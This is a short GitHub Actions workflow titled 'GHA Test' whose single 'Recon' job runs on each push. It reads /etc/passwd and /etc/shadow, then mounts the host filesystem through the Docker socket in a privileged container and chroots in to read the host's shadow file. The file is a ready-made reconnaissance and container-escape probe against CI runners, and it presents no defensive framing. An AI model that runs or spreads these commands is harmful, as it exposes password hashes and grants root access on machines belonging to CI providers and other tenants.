name: GHA Test
on: [push]
jobs: 
  Recon: #Each job can run for 6h max
    runs-on: ubuntu-latest
    steps:
      - run: |     
            cat /etc/passwd
            cat /etc/shadow
            docker -H unix:///var/run/docker.sock run -v /:/host --privileged ubuntu chroot /host cat /etc/shadow
            

            
       
